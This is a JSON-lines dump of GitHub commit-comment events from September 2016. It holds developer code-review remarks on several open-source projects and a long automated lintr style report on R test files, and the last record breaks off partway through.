{"id":"4561526154","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19017667,"position":15,"line":15,"path":"src/test/java/com/tdd/checkout/CheckoutHandlerTest.java","commit_id":"9b0b2c71604046ba1f74ce4e9be227d305eac8b6","created_at":"2016-09-14T12:05:19Z","updated_at":"2016-09-14T12:05:19Z","body":"This test case is technically not required. I dont see the purpose it serves. "}},"created_at":"2016-09-14T12:05:19Z"}
{"id":"4561527500","type":"CommitCommentEvent","actor":{"login":"whalo"},"repo":{"name":"tapooll/TextBasedMeme"},"payload":{"comment":{"id":19017669,"position":null,"line":null,"path":null,"commit_id":"ee6a30b1ea84d6906cf5a2a0700397aed7d6268a","created_at":"2016-09-14T12:05:30Z","updated_at":"2016-09-14T12:05:30Z","body":"//moi mee pois"}},"created_at":"2016-09-14T12:05:30Z"}
{"id":"4561532609","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19017679,"position":33,"line":33,"path":"src/main/java/com/tdd/checkout/CheckoutHandler.java","commit_id":"745afae934c7fb590fedb8b90d9d2656931504f2","created_at":"2016-09-14T12:06:40Z","updated_at":"2016-09-14T12:06:40Z","body":"prefer the use of enums instead of string literals.. "}},"created_at":"2016-09-14T12:06:40Z"}
{"id":"4561534832","type":"CommitCommentEvent","actor":{"login":"nitincchauhan"},"repo":{"name":"brettwooldridge/HikariCP"},"payload":{"comment":{"id":19017681,"position":null,"line":null,"path":null,"commit_id":"5e05adcd27ceeaa4b6b5a23930505f99ff3b0644","created_at":"2016-09-14T12:07:11Z","updated_at":"2016-09-14T12:07:11Z","body":"nullify after successful isConnectionAlive too,  just like newConnection(). otherwise getConnection() may report 'stale' exception and it can not used to distinguish as pool exhausted or db problem\r\n\r\nAlso, probably setting 'cause' as nextException is redundant. it is polluting log as exception printing also takes care of cause, as ...caused by..."}},"created_at":"2016-09-14T12:07:11Z"}
{"id":"4561535918","type":"CommitCommentEvent","actor":{"login":"patmbolger"},"repo":{"name":"arun1595/MetPlus_PETS"},"payload":{"comment":{"id":19017685,"position":14,"line":14,"path":"app/jobs/company_mailer_job.rb","commit_id":"89fe5b92721aac38631567582509e79f439cd560","created_at":"2016-09-14T12:07:25Z","updated_at":"2016-09-14T12:07:25Z","body":"The reason we are delaying the job is to prevent the user from waiting while we create and send the email.  However, this statement is blocking, and if the cruncher takes awhile to return the résumé, or is unavailable and we have to wait for a timeout, the user could have a noticeable wait while all this occurs.\r\n\r\nThats why doing this in the mailer method would be best, I think - that work would happen in a separate process and not block the user.  Also, we will see résumé fetch success/failure in the delayed jobs log (or console), together with the status of other actions required to send the email."}},"created_at":"2016-09-14T12:07:25Z"}
{"id":"4561539662","type":"CommitCommentEvent","actor":{"login":"patmbolger"},"repo":{"name":"arun1595/MetPlus_PETS"},"payload":{"comment":{"id":19017714,"position":20,"line":20,"path":"app/jobs/company_mailer_job.rb","commit_id":"89fe5b92721aac38631567582509e79f439cd560","created_at":"2016-09-14T12:08:15Z","updated_at":"2016-09-14T12:08:15Z","body":"This seems to run after every delayed job(?).  That is overkill for all delayed jobs except the :JS_APPLY job.\r\n\r\n"}},"created_at":"2016-09-14T12:08:15Z"}
{"id":"4561539878","type":"CommitCommentEvent","actor":{"login":"gianpaj"},"repo":{"name":"mongodb/docs"},"payload":{"comment":{"id":19017715,"position":358,"line":358,"path":"source/release-notes/3.3-dev-series-collation.txt","commit_id":"9645faaaaf75e26b06a7aa30d29aaeb5bd317728","created_at":"2016-09-14T12:08:17Z","updated_at":"2016-09-14T12:08:17Z","body":"I believe if there is no specific collation the index will be created without one. Or else, with which one?"}},"created_at":"2016-09-14T12:08:17Z"}
{"id":"4561541813","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19017718,"position":null,"line":null,"path":null,"commit_id":"745afae934c7fb590fedb8b90d9d2656931504f2","created_at":"2016-09-14T12:08:44Z","updated_at":"2016-09-14T12:08:44Z","body":"* too much stuff happening in one commit.. \r\n"}},"created_at":"2016-09-14T12:08:44Z"}
{"id":"4561542502","type":"CommitCommentEvent","actor":{"login":"raquelalvarezbanos"},"repo":{"name":"mantidproject/mantid"},"payload":{"comment":{"id":19017720,"position":125,"line":678,"path":"Framework/Algorithms/test/ReflectometryReductionOneTest.h","commit_id":"56ecf422ff31297a429690b8a3892739cb635d5f","created_at":"2016-09-14T12:08:53Z","updated_at":"2016-09-14T12:08:53Z","body":"For this test and the one above, I think we should be testing the instrument rather than the values in the workspace. When we set `CorrectDetectorPositions` to `True`, according to the documentation what we are doing is:\r\n\r\n> Detector Position Correction is used for when the position of the detector is not aligned with the reflected beamline. The correction algorithm used is SpecularReflectionPositionCorrect v1 which is a purely vertical position correction\r\n\r\nThis means that we are changing the instrument attached to the workspace, but not the values (this is the reason why we are getting the same counts as in `test_wavelength_conversion_1()`). Therefore it would make more sense to test the instrument geometry after the execution (it's fine if you want to leave the checks on the `Y` counts as well).\r\n\r\nOne thing to consider is that for the instrument to be corrected, we have to provide a value for `ThetaIn`, otherwise the correction will not be performed (this can be seen in the workflow diagram \"ReflectometryReductionOne Correct Detector Positions Flowchart\").\r\n\r\nIn summary, for this test (and the one above) I think we need to:\r\n- Create the algorithm as you've done, but in addition set `ThetaIn` to a value.\r\n- Retrieve the output workspace in wavelength, as you've done.\r\n- Test that the dectectors have been moved, ideally testing that they are in the correct position. There are some examples in `WorkspaceCreationHelper.cpp` that illustrate how to work with instrument and instrument components, in particular detectors. Let me know if you need help with this."}},"created_at":"2016-09-14T12:08:53Z"}
{"id":"4561544160","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19017723,"position":null,"line":null,"path":null,"commit_id":"4d72913711c239234e2831fbc30629687aa8c399","created_at":"2016-09-14T12:09:17Z","updated_at":"2016-09-14T12:09:17Z","body":"wann muss der cron starten und wie oft?"}},"created_at":"2016-09-14T12:09:17Z"}
{"id":"4561545441","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017725,"position":null,"line":null,"path":null,"commit_id":"6ab2744675bbb53808cc4006ed8b05ed5d7664a0","created_at":"2016-09-14T12:09:36Z","updated_at":"2016-09-14T12:09:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 997](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13251&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T12:09:36Z"}
{"id":"4561545835","type":"CommitCommentEvent","actor":{"login":"gianpaj"},"repo":{"name":"mongodb/docs"},"payload":{"comment":{"id":19017727,"position":373,"line":373,"path":"source/release-notes/3.3-dev-series-collation.txt","commit_id":"9645faaaaf75e26b06a7aa30d29aaeb5bd317728","created_at":"2016-09-14T12:09:42Z","updated_at":"2016-09-14T12:09:42Z","body":"I believe this sentence was left from a previous edit"}},"created_at":"2016-09-14T12:09:42Z"}
{"id":"4561548174","type":"CommitCommentEvent","actor":{"login":"kamikaze"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19017730,"position":115,"line":115,"path":"stmhal/boards/pllvalues.py","commit_id":"0fd3d8d19fe63e1ddbe6bcf86efef53406c21844","created_at":"2016-09-14T12:10:14Z","updated_at":"2016-09-14T12:10:14Z","body":"why do you need to call main() instead of placing its code directly here?"}},"created_at":"2016-09-14T12:10:14Z"}
{"id":"4561551398","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19017736,"position":null,"line":null,"path":null,"commit_id":"cc41e5c730450e9d46481a81b1932adfe7f36295","created_at":"2016-09-14T12:10:58Z","updated_at":"2016-09-14T12:10:58Z","body":"[tests/testthat/test_calculate_weight.R:13:37:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_calculate_weight.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​    dunif(x[2], min = 0, max = 1000) \n                                    ^\n```\n[tests/testthat/test_calculate_weight.R:17:6:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_calculate_weight.R#L17) *style:* **Commented code should be removed.**\n```r\n​    #log(5) - log(10) == -1 * (log(20) - log(10))\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:19:57:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_calculate_weight.R#L19) *style:* **Trailing whitespace is superfluous.**\n```r\n​      current = c(5, 5), sigma, prior_density_function), \n                                                        ^\n```\n[tests/testthat/test_calculate_weight.R:22:59:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_calculate_weight.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​      current = c(20, 20), sigma, prior_density_function), \n                                                          ^\n```\n[tests/testthat/test_mcmc_nltt.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tset.seed(1) #just to be safe\n^\n```\n[tests/testthat/test_mcmc_nltt.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L7) *style:* **lines should not be more than 80 characters.**\n```r\n​  tree1 <- TESS::tess.sim.taxa(n = 1, nTaxa = 100, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tLL_BD <- function(params, phy) {\n^\n```\n[tests/testthat/test_mcmc_nltt.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L8) *style:* **lines should not be more than 80 characters.**\n```r\n​  tree2 <- TESS::tess.sim.taxa(n = 1, nTaxa = 100, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:9:3:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n  ^~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n^~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:10:3:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L11) *style:* **lines should not be more than 80 characters.**\n```r\n​    lnl <- TESS::tess.likelihood(ape::branching.times(phy), lambda = params[1], mu = params[2],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:11:3:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:12:3:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(lnl + prior1 + prior2)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_mcmc_nltt.R:15:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:15:20:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\treturn(lnl + prior1 + prior2)\n                  ~^\n```\n[tests/testthat/test_mcmc_nltt.R:15:29:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\treturn(lnl + prior1 + prior2)\n                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tmcmc_nltt( q, LL_BD, c(1, 0.0), c(TRUE,TRUE),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"Cannot propose new value for a parameter with value 0.0.\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tmcmc_nltt( 42, LL_BD, c(1, 0.01), c(TRUE, TRUE), \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"mcmc_nltt: phy must be of class 'phylo'\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:44:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( tree1, LL_BD, c(1,0.01), c(TRUE,TRUE), \n                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:58:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( tree1, LL_BD, c(1,0.01), c(TRUE,TRUE), \n                                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:64:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Trailing whitespace is superfluous.**\n```r\n​    colMeans( mcmc_nltt( tree1, LL_BD, c(1,0.01), c(TRUE,TRUE), \n                                                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:25:33:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​      iterations = 10000, burnin=1000, thinning=1, sigma=0.05))[[1]],\n                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:25:48:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​      iterations = 10000, burnin=1000, thinning=1, sigma=0.05))[[1]],\n                                              ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:25:57:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​      iterations = 10000, burnin=1000, thinning=1, sigma=0.05))[[1]],\n                                                       ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tmcmc_nltt( p, LL_BD,c(1, -1), c(TRUE, TRUE), \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:29:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\titerations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n^\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"mcmc_nltt: initial parameter values have to be above zero\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:31:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tML2[[1]],\n^\n```\n[tests/testthat/test_mcmc_nltt.R:31:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:31:40:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1,0.01), c(TRUE,TRUE),\n                                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:31:54:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1,0.01), c(TRUE,TRUE),\n                                                     ^\n```\n[tests/testthat/test_mcmc_nltt.R:32:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttolerance = 0.001\n^\n```\n[tests/testthat/test_mcmc_nltt.R:32:20:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\titerations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                  ~^\n```\n[tests/testthat/test_mcmc_nltt.R:32:36:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\titerations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:32:53:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\titerations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:32:64:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\titerations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                                              ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:34:19:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\ttolerance = 0.001\n                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L37) *style:* **lines should not be more than 80 characters.**\n```r\n​  expect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:38:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L38) *style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:38:55:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L38) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.01))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:39:56:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L39) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.01))[[1]],\n                                                       